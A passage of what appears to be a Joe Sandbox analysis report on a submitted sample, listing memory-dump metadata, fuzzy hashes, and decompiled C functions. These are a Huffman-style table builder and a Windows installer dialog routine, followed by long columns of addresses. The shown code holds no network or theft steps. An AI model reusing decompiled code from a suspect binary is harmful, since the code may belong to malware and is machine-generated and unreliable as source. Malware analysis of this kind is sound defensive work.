                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                  • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                  • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                  • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                  				signed int _v8;
                                  				unsigned int _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				intOrPtr* _v32;
                                  				signed int* _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				intOrPtr _v48;
                                  				intOrPtr _v52;
                                  				void _v116;
                                  				signed int _v176;
                                  				signed int _v180;
                                  				signed int _v240;
                                  				signed int _t166;
                                  				signed int _t168;
                                  				intOrPtr _t175;
                                  				signed int _t181;
                                  				void* _t182;
                                  				intOrPtr _t183;
                                  				signed int* _t184;
                                  				signed int _t186;
                                  				signed int _t187;
                                  				signed int* _t189;
                                  				signed int _t190;
                                  				intOrPtr* _t191;
                                  				intOrPtr _t192;
                                  				signed int _t193;
                                  				signed int _t195;
                                  				signed int _t200;
                                  				signed int _t205;
                                  				void* _t207;
                                  				short _t208;
                                  				signed char _t222;
                                  				signed int _t224;
                                  				signed int _t225;
                                  				signed int* _t232;
                                  				signed int _t233;
                                  				signed int _t234;
                                  				void* _t235;
                                  				signed int _t236;
                                  				signed int _t244;
                                  				signed int _t246;
                                  				signed int _t251;
                                  				signed int _t254;
                                  				signed int _t256;
                                  				signed int _t259;
                                  				signed int _t262;
                                  				void* _t263;
                                  				void* _t264;
                                  				signed int _t267;
                                  				intOrPtr _t269;
                                  				intOrPtr _t271;
                                  				signed int _t274;
                                  				intOrPtr* _t275;
                                  				unsigned int _t276;
                                  				void* _t277;
                                  				signed int _t278;
                                  				intOrPtr* _t279;
                                  				signed int _t281;
                                  				intOrPtr _t282;
                                  				intOrPtr _t283;
                                  				signed int* _t284;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				signed int _t288;
                                  				signed int _t296;
                                  				signed int* _t297;
                                  				intOrPtr _t298;
                                  				void* _t299;
                                  
                                  				_t278 = _a8;
                                  				_t187 = 0x10;
                                  				memset( &_v116, 0, _t187 << 2);
                                  				_t189 = _a4;
                                  				_t233 = _t278;
                                  				do {
                                  					_t166 =  *_t189;
                                  					_t189 =  &(_t189[1]);
                                  					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                  					_t233 = _t233 - 1;
                                  				} while (_t233 != 0);
                                  				if(_v116 != _t278) {
                                  					_t279 = _a28;
                                  					_t267 =  *_t279;
                                  					_t190 = 1;
                                  					_a28 = _t267;
                                  					_t234 = 0xf;
                                  					while(1) {
                                  						_t168 = 0;
                                  						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                  							break;
                                  						}
                                  						_t190 = _t190 + 1;
                                  						if(_t190 <= _t234) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  					_v8 = _t190;
                                  					if(_t267 < _t190) {
                                  						_a28 = _t190;
                                  					}
                                  					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                  						_t234 = _t234 - 1;
                                  						if(_t234 != 0) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  					_v28 = _t234;
                                  					if(_a28 > _t234) {
                                  						_a28 = _t234;
                                  					}
                                  					 *_t279 = _a28;
                                  					_t181 = 1 << _t190;
                                  					while(_t190 < _t234) {
                                  						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                  						if(_t182 < 0) {
                                  							L64:
                                  							return _t168 | 0xffffffff;
                                  						}
                                  						_t190 = _t190 + 1;
                                  						_t181 = _t182 + _t182;
                                  					}
                                  					_t281 = _t234 << 2;
                                  					_t191 = _t299 + _t281 - 0x70;
                                  					_t269 =  *_t191;
                                  					_t183 = _t181 - _t269;
                                  					_v52 = _t183;
                                  					if(_t183 < 0) {
                                  						goto L64;
                                  					}
                                  					_v176 = _t168;
                                  					 *_t191 = _t269 + _t183;
                                  					_t192 = 0;
                                  					_t235 = _t234 - 1;
                                  					if(_t235 == 0) {
                                  						L21:
                                  						_t184 = _a4;
                                  						_t271 = 0;
                                  						do {
                                  							_t193 =  *_t184;
                                  							_t184 =  &(_t184[1]);
                                  							if(_t193 != _t168) {
                                  								_t232 = _t299 + _t193 * 4 - 0xb0;
                                  								_t236 =  *_t232;
                                  								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                  								 *_t232 = _t236 + 1;
                                  							}
                                  							_t271 = _t271 + 1;
                                  						} while (_t271 < _a8);
                                  						_v16 = _v16 | 0xffffffff;
                                  						_v40 = _v40 & 0x00000000;
                                  						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                  						_t195 = _v8;
                                  						_t186 =  ~_a28;
                                  						_v12 = _t168;
                                  						_v180 = _t168;
                                  						_v36 = 0x432190;
                                  						_v240 = _t168;
                                  						if(_t195 > _v28) {
                                  							L62:
                                  							_t168 = 0;
                                  							if(_v52 == 0 || _v28 == 1) {
                                  								return _t168;
                                  							} else {
                                  								goto L64;
                                  							}
                                  						}
                                  						_v44 = _t195 - 1;
                                  						_v32 = _t299 + _t195 * 4 - 0x70;
                                  						do {
                                  							_t282 =  *_v32;
                                  							if(_t282 == 0) {
                                  								goto L61;
                                  							}
                                  							while(1) {
                                  								_t283 = _t282 - 1;
                                  								_t200 = _a28 + _t186;
                                  								_v48 = _t283;
                                  								_v24 = _t200;
                                  								if(_v8 <= _t200) {
                                  									goto L45;
                                  								}
                                  								L31:
                                  								_v20 = _t283 + 1;
                                  								do {
                                  									_v16 = _v16 + 1;
                                  									_t296 = _v28 - _v24;
                                  									if(_t296 > _a28) {
                                  										_t296 = _a28;
                                  									}
                                  									_t222 = _v8 - _v24;
                                  									_t254 = 1 << _t222;
                                  									if(1 <= _v20) {
                                  										L40:
                                  										_t256 =  *_a36;
                                  										_t168 = 1 << _t222;
                                  										_v40 = 1;
                                  										_t274 = _t256 + 1;
                                  										if(_t274 > 0x5a0) {
                                  											goto L64;
                                  										}
                                  									} else {
                                  										_t275 = _v32;
                                  										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                  										if(_t222 >= _t296) {
                                  											goto L40;
                                  										}
                                  										while(1) {
                                  											_t222 = _t222 + 1;
                                  											if(_t222 >= _t296) {
                                  												goto L40;
                                  											}
                                  											_t275 = _t275 + 4;
                                  											_t264 = _t263 + _t263;
                                  											_t175 =  *_t275;
                                  											if(_t264 <= _t175) {
                                  												goto L40;
                                  											}
                                  											_t263 = _t264 - _t175;
                                  										}
                                  										goto L40;
                                  									}
                                  									_t168 = _a32 + _t256 * 4;
                                  									_t297 = _t299 + _v16 * 4 - 0xec;
                                  									 *_a36 = _t274;
                                  									_t259 = _v16;
                                  									 *_t297 = _t168;
                                  									if(_t259 == 0) {
                                  										 *_a24 = _t168;
                                  									} else {
                                  										_t276 = _v12;
                                  										_t298 =  *((intOrPtr*)(_t297 - 4));
                                  										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                  										_a5 = _a28;
                                  										_a4 = _t222;
                                  										_t262 = _t276 >> _t186;
                                  										_a6 = (_t168 - _t298 >> 2) - _t262;
                                  										 *(_t298 + _t262 * 4) = _a4;
                                  									}
                                  									_t224 = _v24;
                                  									_t186 = _t224;
                                  									_t225 = _t224 + _a28;
                                  									_v24 = _t225;
                                  								} while (_v8 > _t225);
                                  								L45:
                                  								_t284 = _v36;
                                  								_a5 = _v8 - _t186;
                                  								if(_t284 < 0x432190 + _a8 * 4) {
                                  									_t205 =  *_t284;
                                  									if(_t205 >= _a12) {
                                  										_t207 = _t205 - _a12 + _t205 - _a12;
                                  										_v36 =  &(_v36[1]);
                                  										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                  										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                  									} else {
                                  										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                  										_t208 =  *_t284;
                                  										_v36 =  &(_t284[1]);
                                  									}
                                  									_a6 = _t208;
                                  								} else {
                                  									_a4 = 0xc0;
                                  								}
                                  								_t286 = 1 << _v8 - _t186;
                                  								_t244 = _v12 >> _t186;
                                  								while(_t244 < _v40) {
                                  									 *(_t168 + _t244 * 4) = _a4;
                                  									_t244 = _t244 + _t286;
                                  								}
                                  								_t287 = _v12;
                                  								_t246 = 1 << _v44;
                                  								while((_t287 & _t246) != 0) {
                                  									_t287 = _t287 ^ _t246;
                                  									_t246 = _t246 >> 1;
                                  								}
                                  								_t288 = _t287 ^ _t246;
                                  								_v20 = 1;
                                  								_v12 = _t288;
                                  								_t251 = _v16;
                                  								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                  									L60:
                                  									if(_v48 != 0) {
                                  										_t282 = _v48;
                                  										_t283 = _t282 - 1;
                                  										_t200 = _a28 + _t186;
                                  										_v48 = _t283;
                                  										_v24 = _t200;
                                  										if(_v8 <= _t200) {
                                  											goto L45;
                                  										}
                                  										goto L31;
                                  									}
                                  									break;
                                  								} else {
                                  									goto L58;
                                  								}
                                  								do {
                                  									L58:
                                  									_t186 = _t186 - _a28;
                                  									_t251 = _t251 - 1;
                                  								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                  								_v16 = _t251;
                                  								goto L60;
                                  							}
                                  							L61:
                                  							_v8 = _v8 + 1;
                                  							_v32 = _v32 + 4;
                                  							_v44 = _v44 + 1;
                                  						} while (_v8 <= _v28);
                                  						goto L62;
                                  					}
                                  					_t277 = 0;
                                  					do {
                                  						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                  						_t277 = _t277 + 4;
                                  						_t235 = _t235 - 1;
                                  						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                  					} while (_t235 != 0);
                                  					goto L21;
                                  				}
                                  				 *_a24 =  *_a24 & 0x00000000;
                                  				 *_a28 =  *_a28 & 0x00000000;
                                  				return 0;
                                  			}











































































                                  0x00407567
                                  0x0040756f
                                  0x00407573
                                  0x00407575
                                  0x00407578
                                  0x0040757a
                                  0x0040757a
                                  0x0040757c
                                  0x00407583
                                  0x00407585
                                  0x00407585
                                  0x0040758b
                                  0x004075a0
                                  0x004075a8
                                  0x004075aa
                                  0x004075ac
                                  0x004075af
                                  0x004075b0
                                  0x004075b0
                                  0x004075b6
                                  0x00000000
                                  0x00000000
                                  0x004075b8
                                  0x004075bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004075bb
                                  0x004075bf
                                  0x004075c2
                                  0x004075c4
                                  0x004075c4
                                  0x004075c7
                                  0x004075cd
                                  0x004075ce
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004075ce
                                  0x004075d3
                                  0x004075d6
                                  0x004075d8
                                  0x004075d8
                                  0x004075de
                                  0x004075e0
                                  0x004075f1
                                  0x004075e4
                                  0x004075e8
                                  0x0040788d
                                  0x00000000
                                  0x0040788d
                                  0x004075ee
                                  0x004075ef
                                  0x004075ef
                                  0x004075f7
                                  0x004075fa
                                  0x004075fe
                                  0x00407600
                                  0x00407602
                                  0x00407605
                                  0x00000000
                                  0x00000000
                                  0x0040760d
                                  0x00407613
                                  0x00407615
                                  0x00407617
                                  0x00407618
                                  0x0040762d
                                  0x0040762d
                                  0x00407630
                                  0x00407632
                                  0x00407632
                                  0x00407634
                                  0x00407639
                                  0x0040763b
                                  0x00407642
                                  0x00407644
                                  0x0040764c
                                  0x0040764c
                                  0x0040764e
                                  0x0040764f
                                  0x0040765e
                                  0x00407662
                                  0x00407666
                                  0x00407669
                                  0x0040766c
                                  0x00407671
                                  0x00407674
                                  0x0040767a
                                  0x00407681
                                  0x00407687
                                  0x00407880
                                  0x00407880
                                  0x00407885
                                  0x00407894
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407885
                                  0x00407694
                                  0x00407697
                                  0x0040769a
                                  0x0040769d
                                  0x004076a1
                                  0x00000000
                                  0x00000000
                                  0x004076ac
                                  0x004076af
                                  0x004076b0
                                  0x004076b2
                                  0x004076b8
                                  0x004076bb
                                  0x00000000
                                  0x00000000
                                  0x004076c1
                                  0x004076c2
                                  0x004076c5
                                  0x004076c8
                                  0x004076cb
                                  0x004076d1
                                  0x004076d3
                                  0x004076d3
                                  0x004076db
                                  0x004076df
                                  0x004076e4
                                  0x00407709
                                  0x0040770f
                                  0x00407711
                                  0x00407713
                                  0x00407716
                                  0x0040771f
                                  0x00000000
                                  0x00000000
                                  0x004076e6
                                  0x004076e6
                                  0x004076ef
                                  0x004076f3
                                  0x00000000
                                  0x00000000
                                  0x00407704
                                  0x00407704
                                  0x00407707
                                  0x00000000
                                  0x00000000
                                  0x004076f7
                                  0x004076fa
                                  0x004076fc
                                  0x00407700
                                  0x00000000
                                  0x00000000
                                  0x00407702
                                  0x00407702
                                  0x00000000
                                  0x00407704
                                  0x00407728
                                  0x0040772e
                                  0x00407738
                                  0x0040773a
                                  0x0040773f
                                  0x00407741
                                  0x00407777
                                  0x00407743
                                  0x00407743
                                  0x00407746
                                  0x00407749
                                  0x00407753
                                  0x00407756
                                  0x0040775d
                                  0x00407768
                                  0x0040776f
                                  0x0040776f
                                  0x00407779
                                  0x0040777c
                                  0x0040777e
                                  0x00407784
                                  0x00407784
                                  0x0040778d
                                  0x00407790
                                  0x00407795
                                  0x004077a4
                                  0x004077ac
                                  0x004077b1
                                  0x004077d5
                                  0x004077dd
                                  0x004077e1
                                  0x004077e7
                                  0x004077b3
                                  0x004077c1
                                  0x004077c4
                                  0x004077ca
                                  0x004077ca
                                  0x004077eb
                                  0x004077a6
                                  0x004077a6
                                  0x004077a6
                                  0x004077fc
                                  0x00407800
                                  0x0040780c
                                  0x00407807
                                  0x0040780a
                                  0x0040780a
                                  0x00407814
                                  0x00407819
                                  0x00407821
                                  0x0040781d
                                  0x0040781f
                                  0x0040781f
                                  0x00407827
                                  0x00407829
                                  0x00407830
                                  0x0040783a
                                  0x00407844
                                  0x00407860
                                  0x00407864
                                  0x004076a9
                                  0x004076af
                                  0x004076b0
                                  0x004076b2
                                  0x004076b8
                                  0x004076bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004076bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407846
                                  0x00407846
                                  0x00407846
                                  0x0040784b
                                  0x00407854
                                  0x0040785d
                                  0x00000000
                                  0x0040785d
                                  0x0040786a
                                  0x0040786a
                                  0x0040786d
                                  0x00407874
                                  0x00407877
                                  0x00000000
                                  0x0040769a
                                  0x0040761a
                                  0x0040761c
                                  0x0040761c
                                  0x00407620
                                  0x00407623
                                  0x00407624
                                  0x00407624
                                  0x00000000
                                  0x0040761c
                                  0x00407590
                                  0x00407596
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                  • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                  • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				long _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				signed char* _v32;
                                  				int _v36;
                                  				signed int _v44;
                                  				int _v48;
                                  				signed int* _v60;
                                  				signed char* _v64;
                                  				signed int _v68;
                                  				long _v72;
                                  				void* _v76;
                                  				intOrPtr _v80;
                                  				intOrPtr _v84;
                                  				void* _v88;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t198;
                                  				intOrPtr _t201;
                                  				intOrPtr _t202;
                                  				long _t207;
                                  				signed int _t211;
                                  				signed int _t222;
                                  				void* _t225;
                                  				void* _t226;
                                  				int _t232;
                                  				long _t237;
                                  				long _t238;
                                  				signed int _t239;
                                  				signed int _t245;
                                  				signed int _t247;
                                  				signed char _t248;
                                  				signed char _t254;
                                  				void* _t258;
                                  				void* _t260;
                                  				signed char* _t278;
                                  				signed char _t279;
                                  				long _t284;
                                  				struct HWND__* _t291;
                                  				signed int* _t292;
                                  				int _t293;
                                  				long _t294;
                                  				signed int _t295;
                                  				void* _t297;
                                  				long _t298;
                                  				int _t299;
                                  				signed int _t300;
                                  				signed int _t303;
                                  				signed int _t311;
                                  				signed char* _t319;
                                  				int _t324;
                                  				void* _t326;
                                  
                                  				_t291 = _a4;
                                  				_v12 = GetDlgItem(_t291, 0x3f9);
                                  				_v8 = GetDlgItem(_t291, 0x408);
                                  				_t326 = SendMessageW;
                                  				_v24 =  *0x434f28;
                                  				_v28 =  *0x434f10 + 0x94;
                                  				if(_a8 != 0x110) {
                                  					L23:
                                  					if(_a8 != 0x405) {
                                  						_t301 = _a16;
                                  					} else {
                                  						_a12 = 0;
                                  						_t301 = 1;
                                  						_a8 = 0x40f;
                                  						_a16 = 1;
                                  					}
                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                  						_v16 = _t301;
                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                  							if(( *0x434f19 & 0x00000002) != 0) {
                                  								L41:
                                  								if(_v16 != 0) {
                                  									_t237 = _v16;
                                  									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                  										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                  									}
                                  									_t238 = _v16;
                                  									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                  										_t301 = _v24;
                                  										_t239 =  *(_t238 + 0x5c);
                                  										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                  										} else {
                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                  										}
                                  									}
                                  								}
                                  								goto L48;
                                  							}
                                  							if(_a8 == 0x413) {
                                  								L33:
                                  								_t301 = 0 | _a8 != 0x00000413;
                                  								_t245 = E00404E54(_v8, _a8 != 0x413);
                                  								_t295 = _t245;
                                  								if(_t295 >= 0) {
                                  									_t94 = _v24 + 8; // 0x8
                                  									_t301 = _t245 * 0x818 + _t94;
                                  									_t247 =  *_t301;
                                  									if((_t247 & 0x00000010) == 0) {
                                  										if((_t247 & 0x00000040) == 0) {
                                  											_t248 = _t247 ^ 0x00000001;
                                  										} else {
                                  											_t254 = _t247 ^ 0x00000080;
                                  											if(_t254 >= 0) {
                                  												_t248 = _t254 & 0x000000fe;
                                  											} else {
                                  												_t248 = _t254 | 0x00000001;
                                  											}
                                  										}
                                  										 *_t301 = _t248;
                                  										E0040117D(_t295);
                                  										_a12 = _t295 + 1;
                                  										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                  										_a8 = 0x40f;
                                  									}
                                  								}
                                  								goto L41;
                                  							}
                                  							_t301 = _a16;
                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                  								goto L41;
                                  							}
                                  							goto L33;
                                  						} else {
                                  							goto L48;
                                  						}
                                  					} else {
                                  						L48:
                                  						if(_a8 != 0x111) {
                                  							L56:
                                  							if(_a8 == 0x200) {
                                  								SendMessageW(_v8, 0x200, 0, 0);
                                  							}
                                  							if(_a8 == 0x40b) {
                                  								_t225 =  *0x42d24c;
                                  								if(_t225 != 0) {
                                  									ImageList_Destroy(_t225);
                                  								}
                                  								_t226 =  *0x42d260;
                                  								if(_t226 != 0) {
                                  									GlobalFree(_t226);
                                  								}
                                  								 *0x42d24c = 0;
                                  								 *0x42d260 = 0;
                                  								 *0x434f60 = 0;
                                  							}
                                  							if(_a8 != 0x40f) {
                                  								L90:
                                  								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                  									_t324 = (0 | _a16 == 0x00000020) << 3;
                                  									ShowWindow(_v8, _t324);
                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                  								}
                                  								goto L93;
                                  							} else {
                                  								E004011EF(_t301, 0, 0);
                                  								_t198 = _a12;
                                  								if(_t198 != 0) {
                                  									if(_t198 != 0xffffffff) {
                                  										_t198 = _t198 - 1;
                                  									}
                                  									_push(_t198);
                                  									_push(8);
                                  									E00404ED4();
                                  								}
                                  								if(_a16 == 0) {
                                  									L75:
                                  									E004011EF(_t301, 0, 0);
                                  									_v36 =  *0x42d260;
                                  									_t201 =  *0x434f28;
                                  									_v64 = 0xf030;
                                  									_v24 = 0;
                                  									if( *0x434f2c <= 0) {
                                  										L86:
                                  										if( *0x434fbe == 0x400) {
                                  											InvalidateRect(_v8, 0, 1);
                                  										}
                                  										_t202 =  *0x433edc; // 0x81267e
                                  										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
                                  											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                  										}
                                  										goto L90;
                                  									}
                                  									_t292 = _t201 + 8;
                                  									do {
                                  										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                  										if(_t207 != 0) {
                                  											_t303 =  *_t292;
                                  											_v72 = _t207;
                                  											_v76 = 8;
                                  											if((_t303 & 0x00000001) != 0) {
                                  												_v76 = 9;
                                  												_v60 =  &(_t292[4]);
                                  												_t292[0] = _t292[0] & 0x000000fe;
                                  											}
                                  											if((_t303 & 0x00000040) == 0) {
                                  												_t211 = (_t303 & 0x00000001) + 1;
                                  												if((_t303 & 0x00000010) != 0) {
                                  													_t211 = _t211 + 3;
                                  												}
                                  											} else {
                                  												_t211 = 3;
                                  											}
                                  											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                  											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                  											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                  										}
                                  										_v24 = _v24 + 1;
                                  										_t292 =  &(_t292[0x206]);
                                  									} while (_v24 <  *0x434f2c);
                                  									goto L86;
                                  								} else {
                                  									_t293 = E004012E2( *0x42d260);
                                  									E00401299(_t293);
                                  									_t222 = 0;
                                  									_t301 = 0;
                                  									if(_t293 <= 0) {
                                  										L74:
                                  										SendMessageW(_v12, 0x14e, _t301, 0);
                                  										_a16 = _t293;
                                  										_a8 = 0x420;
                                  										goto L75;
                                  									} else {
                                  										goto L71;
                                  									}
                                  									do {
                                  										L71:
                                  										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                  											_t301 = _t301 + 1;
                                  										}
                                  										_t222 = _t222 + 1;
                                  									} while (_t222 < _t293);
                                  									goto L74;
                                  								}
                                  							}
                                  						}
                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                  							goto L93;
                                  						} else {
                                  							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                  							if(_t232 == 0xffffffff) {
                                  								goto L93;
                                  							}
                                  							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                  							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                  								_t294 = 0x20;
                                  							}
                                  							E00401299(_t294);
                                  							SendMessageW(_a4, 0x420, 0, _t294);
                                  							_a12 = _a12 | 0xffffffff;
                                  							_a16 = 0;
                                  							_a8 = 0x40f;
                                  							goto L56;
                                  						}
                                  					}
                                  				} else {
                                  					_v36 = 0;
                                  					_v20 = 2;
                                  					 *0x434f60 = _t291;
                                  					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                  					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                  					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                  					_t297 = _t258;
                                  					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                  					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                  					 *0x42d24c = _t260;
                                  					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                  					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                  					}
                                  					DeleteObject(_t297);
                                  					_t298 = 0;
                                  					do {
                                  						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                  						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                  							if(_t298 != 0x20) {
                                  								_v20 = 0;
                                  							}
                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                  						}
                                  						_t298 = _t298 + 1;
                                  					} while (_t298 < 0x21);
                                  					_t299 = _a16;
                                  					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                  					_push(0x15);
                                  					E00404499(_a4);
                                  					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                  					_push(0x16);
                                  					E00404499(_a4);
                                  					_t300 = 0;
                                  					_v16 = 0;
                                  					if( *0x434f2c <= 0) {
                                  						L19:
                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                  						goto L20;
                                  					} else {
                                  						_t319 = _v24 + 8;
                                  						_v32 = _t319;
                                  						do {
                                  							_t278 =  &(_t319[0x10]);
                                  							if( *_t278 != 0) {
                                  								_v64 = _t278;
                                  								_t279 =  *_t319;
                                  								_v88 = _v16;
                                  								_t311 = 0x20;
                                  								_v84 = 0xffff0002;
                                  								_v80 = 0xd;
                                  								_v68 = _t311;
                                  								_v44 = _t300;
                                  								_v72 = _t279 & _t311;
                                  								if((_t279 & 0x00000002) == 0) {
                                  									if((_t279 & 0x00000004) == 0) {
                                  										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                  									} else {
                                  										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                  									}
                                  								} else {
                                  									_v80 = 0x4d;
                                  									_v48 = 1;
                                  									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                  									_v36 = 1;
                                  									 *( *0x42d260 + _t300 * 4) = _t284;
                                  									_v16 =  *( *0x42d260 + _t300 * 4);
                                  								}
                                  							}
                                  							_t300 = _t300 + 1;
                                  							_t319 =  &(_v32[0x818]);
                                  							_v32 = _t319;
                                  						} while (_t300 <  *0x434f2c);
                                  						if(_v36 != 0) {
                                  							L20:
                                  							if(_v20 != 0) {
                                  								E004044CE(_v8);
                                  								goto L23;
                                  							} else {
                                  								ShowWindow(_v12, 5);
                                  								E004044CE(_v12);
                                  								L93:
                                  								return E00404500(_a8, _a12, _a16);
                                  							}
                                  						}
                                  						goto L19;
                                  					}
                                  				}
                                  			}



























































                                  0x00404f0d
                                  0x00404f26
                                  0x00404f2b
                                  0x00404f33
